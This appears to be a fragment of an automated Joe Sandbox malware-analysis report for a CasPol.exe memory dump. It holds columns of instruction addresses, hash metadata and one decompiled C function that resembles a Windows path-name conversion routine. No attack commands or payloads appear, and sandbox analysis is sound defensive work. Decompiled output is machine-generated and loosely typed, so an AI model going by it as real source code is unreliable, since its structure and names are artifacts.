                                                                                                                                                                                                                                                                                                0x017f60b3
                                                                                                                                                                                                                                                                                                0x017f60b6
                                                                                                                                                                                                                                                                                                0x017f60b8
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60be
                                                                                                                                                                                                                                                                                                0x017f60c0
                                                                                                                                                                                                                                                                                                0x017f60c5
                                                                                                                                                                                                                                                                                                0x017f60c5
                                                                                                                                                                                                                                                                                                0x017f60c5
                                                                                                                                                                                                                                                                                                0x017f60c6
                                                                                                                                                                                                                                                                                                0x017f60cd
                                                                                                                                                                                                                                                                                                0x017f6114
                                                                                                                                                                                                                                                                                                0x017f60cf
                                                                                                                                                                                                                                                                                                0x017f60cf
                                                                                                                                                                                                                                                                                                0x017f60d4
                                                                                                                                                                                                                                                                                                0x017f60d5
                                                                                                                                                                                                                                                                                                0x017f60da
                                                                                                                                                                                                                                                                                                0x017f60db
                                                                                                                                                                                                                                                                                                0x017f60e1
                                                                                                                                                                                                                                                                                                0x017f60e2
                                                                                                                                                                                                                                                                                                0x017f60e8
                                                                                                                                                                                                                                                                                                0x017f60f8
                                                                                                                                                                                                                                                                                                0x017f60fd
                                                                                                                                                                                                                                                                                                0x017f60fe
                                                                                                                                                                                                                                                                                                0x017f6102
                                                                                                                                                                                                                                                                                                0x017f6104
                                                                                                                                                                                                                                                                                                0x017f6107
                                                                                                                                                                                                                                                                                                0x017f6109
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610f
                                                                                                                                                                                                                                                                                                0x017f610f
                                                                                                                                                                                                                                                                                                0x017f6117
                                                                                                                                                                                                                                                                                                0x017f611a
                                                                                                                                                                                                                                                                                                0x017f611f
                                                                                                                                                                                                                                                                                                0x017f6125
                                                                                                                                                                                                                                                                                                0x017f6134
                                                                                                                                                                                                                                                                                                0x017f6139
                                                                                                                                                                                                                                                                                                0x017f613f
                                                                                                                                                                                                                                                                                                0x017f6146
                                                                                                                                                                                                                                                                                                0x017f6148
                                                                                                                                                                                                                                                                                                0x017f614b
                                                                                                                                                                                                                                                                                                0x017f614d
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f6153
                                                                                                                                                                                                                                                                                                0x017f6159
                                                                                                                                                                                                                                                                                                0x017f6159
                                                                                                                                                                                                                                                                                                0x017f615c
                                                                                                                                                                                                                                                                                                0x017f6163
                                                                                                                                                                                                                                                                                                0x017f6169
                                                                                                                                                                                                                                                                                                0x017f616c
                                                                                                                                                                                                                                                                                                0x017f6172
                                                                                                                                                                                                                                                                                                0x017f6181
                                                                                                                                                                                                                                                                                                0x017f6186
                                                                                                                                                                                                                                                                                                0x017f6187
                                                                                                                                                                                                                                                                                                0x017f618b
                                                                                                                                                                                                                                                                                                0x017f6191
                                                                                                                                                                                                                                                                                                0x017f6195
                                                                                                                                                                                                                                                                                                0x017f61a3
                                                                                                                                                                                                                                                                                                0x017f61bb
                                                                                                                                                                                                                                                                                                0x017f61c0
                                                                                                                                                                                                                                                                                                0x017f61c3
                                                                                                                                                                                                                                                                                                0x017f61cc
                                                                                                                                                                                                                                                                                                0x017f61d0
                                                                                                                                                                                                                                                                                                0x017f61dc
                                                                                                                                                                                                                                                                                                0x017f61de
                                                                                                                                                                                                                                                                                                0x017f61e1
                                                                                                                                                                                                                                                                                                0x017f61e4
                                                                                                                                                                                                                                                                                                0x017f61e6
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e6
                                                                                                                                                                                                                                                                                                0x017f61ec
                                                                                                                                                                                                                                                                                                0x017f61f3
                                                                                                                                                                                                                                                                                                0x017f6203
                                                                                                                                                                                                                                                                                                0x017f6209
                                                                                                                                                                                                                                                                                                0x017f620a
                                                                                                                                                                                                                                                                                                0x017f6216
                                                                                                                                                                                                                                                                                                0x017f621d
                                                                                                                                                                                                                                                                                                0x017f6227
                                                                                                                                                                                                                                                                                                0x017f6241
                                                                                                                                                                                                                                                                                                0x017f6246
                                                                                                                                                                                                                                                                                                0x017f624c
                                                                                                                                                                                                                                                                                                0x017f6257
                                                                                                                                                                                                                                                                                                0x017f6259
                                                                                                                                                                                                                                                                                                0x017f625c
                                                                                                                                                                                                                                                                                                0x017f625e
                                                                                                                                                                                                                                                                                                0x017f6260
                                                                                                                                                                                                                                                                                                0x017f6260
                                                                                                                                                                                                                                                                                                0x017f6260
                                                                                                                                                                                                                                                                                                0x017f6260
                                                                                                                                                                                                                                                                                                0x017f625e
                                                                                                                                                                                                                                                                                                0x017f6264
                                                                                                                                                                                                                                                                                                0x017f6267
                                                                                                                                                                                                                                                                                                0x017f6269
                                                                                                                                                                                                                                                                                                0x017f6315
                                                                                                                                                                                                                                                                                                0x017f6315
                                                                                                                                                                                                                                                                                                0x017f631b
                                                                                                                                                                                                                                                                                                0x017f631e
                                                                                                                                                                                                                                                                                                0x017f6324
                                                                                                                                                                                                                                                                                                0x017f6327
                                                                                                                                                                                                                                                                                                0x017f632f
                                                                                                                                                                                                                                                                                                0x017f6330
                                                                                                                                                                                                                                                                                                0x017f6333
                                                                                                                                                                                                                                                                                                0x017f633a
                                                                                                                                                                                                                                                                                                0x017f633c
                                                                                                                                                                                                                                                                                                0x017f6335
                                                                                                                                                                                                                                                                                                0x017f6335
                                                                                                                                                                                                                                                                                                0x017f6335
                                                                                                                                                                                                                                                                                                0x017f633f
                                                                                                                                                                                                                                                                                                0x017f6342
                                                                                                                                                                                                                                                                                                0x017f634c
                                                                                                                                                                                                                                                                                                0x017f6352
                                                                                                                                                                                                                                                                                                0x017f6355
                                                                                                                                                                                                                                                                                                0x017f6355
                                                                                                                                                                                                                                                                                                0x017f6359
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f626f
                                                                                                                                                                                                                                                                                                0x017f6275
                                                                                                                                                                                                                                                                                                0x017f6275
                                                                                                                                                                                                                                                                                                0x017f6278
                                                                                                                                                                                                                                                                                                0x017f627e
                                                                                                                                                                                                                                                                                                0x017f627e
                                                                                                                                                                                                                                                                                                0x017f6281
                                                                                                                                                                                                                                                                                                0x017f6287
                                                                                                                                                                                                                                                                                                0x017f628d
                                                                                                                                                                                                                                                                                                0x017f6298
                                                                                                                                                                                                                                                                                                0x017f629c
                                                                                                                                                                                                                                                                                                0x017f62a2
                                                                                                                                                                                                                                                                                                0x017f629e
                                                                                                                                                                                                                                                                                                0x017f629e
                                                                                                                                                                                                                                                                                                0x017f629e
                                                                                                                                                                                                                                                                                                0x017f62a7
                                                                                                                                                                                                                                                                                                0x017f62a7
                                                                                                                                                                                                                                                                                                0x017f62aa
                                                                                                                                                                                                                                                                                                0x017f62b0
                                                                                                                                                                                                                                                                                                0x017f62f0
                                                                                                                                                                                                                                                                                                0x017f62f0
                                                                                                                                                                                                                                                                                                0x017f62f2
                                                                                                                                                                                                                                                                                                0x017f62f8
                                                                                                                                                                                                                                                                                                0x017f62fd
                                                                                                                                                                                                                                                                                                0x017f62b2
                                                                                                                                                                                                                                                                                                0x017f62b2
                                                                                                                                                                                                                                                                                                0x017f62b2
                                                                                                                                                                                                                                                                                                0x017f62b5
                                                                                                                                                                                                                                                                                                0x017f62dd
                                                                                                                                                                                                                                                                                                0x017f62e2
                                                                                                                                                                                                                                                                                                0x017f62e5
                                                                                                                                                                                                                                                                                                0x017f62b7
                                                                                                                                                                                                                                                                                                0x017f62b8
                                                                                                                                                                                                                                                                                                0x017f62bb
                                                                                                                                                                                                                                                                                                0x017f62bd
                                                                                                                                                                                                                                                                                                0x017f62c0
                                                                                                                                                                                                                                                                                                0x017f62c4
                                                                                                                                                                                                                                                                                                0x017f62cd
                                                                                                                                                                                                                                                                                                0x017f62cd
                                                                                                                                                                                                                                                                                                0x017f62c0
                                                                                                                                                                                                                                                                                                0x017f62bb
                                                                                                                                                                                                                                                                                                0x017f62b5
                                                                                                                                                                                                                                                                                                0x017f6302
                                                                                                                                                                                                                                                                                                0x017f6303
                                                                                                                                                                                                                                                                                                0x017f6305
                                                                                                                                                                                                                                                                                                0x017f6305
                                                                                                                                                                                                                                                                                                0x017f6305
                                                                                                                                                                                                                                                                                                0x017f630c
                                                                                                                                                                                                                                                                                                0x017f630c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f627e
                                                                                                                                                                                                                                                                                                0x017f6269
                                                                                                                                                                                                                                                                                                0x017f5eac
                                                                                                                                                                                                                                                                                                0x017f5ebb
                                                                                                                                                                                                                                                                                                0x017f5ebe
                                                                                                                                                                                                                                                                                                0x017f5ecb
                                                                                                                                                                                                                                                                                                0x017f5ecb
                                                                                                                                                                                                                                                                                                0x017f5ece
                                                                                                                                                                                                                                                                                                0x017f5ece
                                                                                                                                                                                                                                                                                                0x017f5ed4
                                                                                                                                                                                                                                                                                                0x017f5ed7
                                                                                                                                                                                                                                                                                                0x017f5ed9
                                                                                                                                                                                                                                                                                                0x017f5edb
                                                                                                                                                                                                                                                                                                0x017f5edb
                                                                                                                                                                                                                                                                                                0x017f5ee1
                                                                                                                                                                                                                                                                                                0x017f5ee1
                                                                                                                                                                                                                                                                                                0x017f5ee3
                                                                                                                                                                                                                                                                                                0x017f5f20
                                                                                                                                                                                                                                                                                                0x017f5f20
                                                                                                                                                                                                                                                                                                0x017f5ee5
                                                                                                                                                                                                                                                                                                0x017f5ee5
                                                                                                                                                                                                                                                                                                0x017f5ee5
                                                                                                                                                                                                                                                                                                0x017f5ee8
                                                                                                                                                                                                                                                                                                0x017f5f11
                                                                                                                                                                                                                                                                                                0x017f5f18
                                                                                                                                                                                                                                                                                                0x017f5eea
                                                                                                                                                                                                                                                                                                0x017f5eea
                                                                                                                                                                                                                                                                                                0x017f5eed
                                                                                                                                                                                                                                                                                                0x017f5ef2
                                                                                                                                                                                                                                                                                                0x017f5ef8
                                                                                                                                                                                                                                                                                                0x017f5efb
                                                                                                                                                                                                                                                                                                0x017f5f0a
                                                                                                                                                                                                                                                                                                0x017f5f0a
                                                                                                                                                                                                                                                                                                0x017f5eed
                                                                                                                                                                                                                                                                                                0x017f5ee8
                                                                                                                                                                                                                                                                                                0x017f5f22
                                                                                                                                                                                                                                                                                                0x017f5f28
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5f30
                                                                                                                                                                                                                                                                                                0x017f5f31
                                                                                                                                                                                                                                                                                                0x017f5f37
                                                                                                                                                                                                                                                                                                0x017f5f3a
                                                                                                                                                                                                                                                                                                0x017f5f3d
                                                                                                                                                                                                                                                                                                0x017f5f44
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5f46
                                                                                                                                                                                                                                                                                                0x017f5f48
                                                                                                                                                                                                                                                                                                0x017f5f4d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5f4d
                                                                                                                                                                                                                                                                                                0x017f5dda
                                                                                                                                                                                                                                                                                                0x017f5ddf
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5ddf
                                                                                                                                                                                                                                                                                                0x017f5dd8
                                                                                                                                                                                                                                                                                                0x017f5da7
                                                                                                                                                                                                                                                                                                0x017f5da9
                                                                                                                                                                                                                                                                                                0x017f5dac
                                                                                                                                                                                                                                                                                                0x017f5dae
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5db4
                                                                                                                                                                                                                                                                                                0x017f5db4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5db4
                                                                                                                                                                                                                                                                                                0x017f5dae
                                                                                                                                                                                                                                                                                                0x017f5d88
                                                                                                                                                                                                                                                                                                0x017f5d8d
                                                                                                                                                                                                                                                                                                0x017f6363
                                                                                                                                                                                                                                                                                                0x017f6369
                                                                                                                                                                                                                                                                                                0x017f636a
                                                                                                                                                                                                                                                                                                0x017f6370
                                                                                                                                                                                                                                                                                                0x017f6372
                                                                                                                                                                                                                                                                                                0x017f637a
                                                                                                                                                                                                                                                                                                0x017f637b
                                                                                                                                                                                                                                                                                                0x017f637d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f637f
                                                                                                                                                                                                                                                                                                0x017f6385
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f6385
                                                                                                                                                                                                                                                                                                0x017f5d38
                                                                                                                                                                                                                                                                                                0x017f5d3b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5d3b
                                                                                                                                                                                                                                                                                                0x017f5d27
                                                                                                                                                                                                                                                                                                0x017f5d29
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f6360
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f6360
                                                                                                                                                                                                                                                                                                0x017f5c10
                                                                                                                                                                                                                                                                                                0x017f5c10
                                                                                                                                                                                                                                                                                                0x017f63da
                                                                                                                                                                                                                                                                                                0x017f63e5
                                                                                                                                                                                                                                                                                                0x017f63e5

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0946c7b5d0db12d450ab563019a12a348f971a72264825dc3b3ca05bc37b3e1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 4665f801f2f3257bd47584552e8f72417374d22a58b6919e8c43e12fa0945b4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0946c7b5d0db12d450ab563019a12a348f971a72264825dc3b3ca05bc37b3e1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E422B75910219CFDB24CF68C880BAAFBB1FF45304F1581AEEA49AB342D7759A85CF50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01744120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                			E01744120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x181d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0175F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L01746E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01744620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L01746E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017445F8))) {
												case 0:
													_v568 = 0x1701078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01744620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L0176F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L0176F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0173EB70(1, 0x18179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0173AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017695D0();
																			L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L0176B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01763D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L0176B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                                                                                                                                                                                                0x01744128
                                                                                                                                                                                                                                                                                                0x01744135
                                                                                                                                                                                                                                                                                                0x0174413c
                                                                                                                                                                                                                                                                                                0x01744141
                                                                                                                                                                                                                                                                                                0x01744145
                                                                                                                                                                                                                                                                                                0x01744147
                                                                                                                                                                                                                                                                                                0x0174414e
                                                                                                                                                                                                                                                                                                0x01744151
                                                                                                                                                                                                                                                                                                0x01744159
                                                                                                                                                                                                                                                                                                0x0174415c
                                                                                                                                                                                                                                                                                                0x01744160
                                                                                                                                                                                                                                                                                                0x01744164
                                                                                                                                                                                                                                                                                                0x01744168
                                                                                                                                                                                                                                                                                                0x0174416c
                                                                                                                                                                                                                                                                                                0x0174417f
                                                                                                                                                                                                                                                                                                0x01744181
                                                                                                                                                                                                                                                                                                0x0174446a
                                                                                                                                                                                                                                                                                                0x0174446a
                                                                                                                                                                                                                                                                                                0x0174418c
                                                                                                                                                                                                                                                                                                0x01744195
                                                                                                                                                                                                                                                                                                0x01744199
                                                                                                                                                                                                                                                                                                0x01744432
                                                                                                                                                                                                                                                                                                0x01744439
                                                                                                                                                                                                                                                                                                0x0174443d
                                                                                                                                                                                                                                                                                                0x01744442
                                                                                                                                                                                                                                                                                                0x01744447
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174419f
                                                                                                                                                                                                                                                                                                0x017441a3
                                                                                                                                                                                                                                                                                                0x017441b1
                                                                                                                                                                                                                                                                                                0x017441b9
                                                                                                                                                                                                                                                                                                0x017441bd
                                                                                                                                                                                                                                                                                                0x017445db
                                                                                                                                                                                                                                                                                                0x017445db
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441c3
                                                                                                                                                                                                                                                                                                0x017441c3
                                                                                                                                                                                                                                                                                                0x017441ce
                                                                                                                                                                                                                                                                                                0x017441d4
                                                                                                                                                                                                                                                                                                0x0178e138
                                                                                                                                                                                                                                                                                                0x0178e13e
                                                                                                                                                                                                                                                                                                0x0178e169
                                                                                                                                                                                                                                                                                                0x0178e16d
                                                                                                                                                                                                                                                                                                0x0178e19e
                                                                                                                                                                                                                                                                                                0x0178e16f
                                                                                                                                                                                                                                                                                                0x0178e16f
                                                                                                                                                                                                                                                                                                0x0178e175
                                                                                                                                                                                                                                                                                                0x0178e179
                                                                                                                                                                                                                                                                                                0x0178e18f
                                                                                                                                                                                                                                                                                                0x0178e193
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e199
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e199
                                                                                                                                                                                                                                                                                                0x0178e193
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441da
                                                                                                                                                                                                                                                                                                0x017441da
                                                                                                                                                                                                                                                                                                0x017441df
                                                                                                                                                                                                                                                                                                0x017441e4
                                                                                                                                                                                                                                                                                                0x017441ec
                                                                                                                                                                                                                                                                                                0x01744203
                                                                                                                                                                                                                                                                                                0x01744207
                                                                                                                                                                                                                                                                                                0x0178e1fd
                                                                                                                                                                                                                                                                                                0x01744222
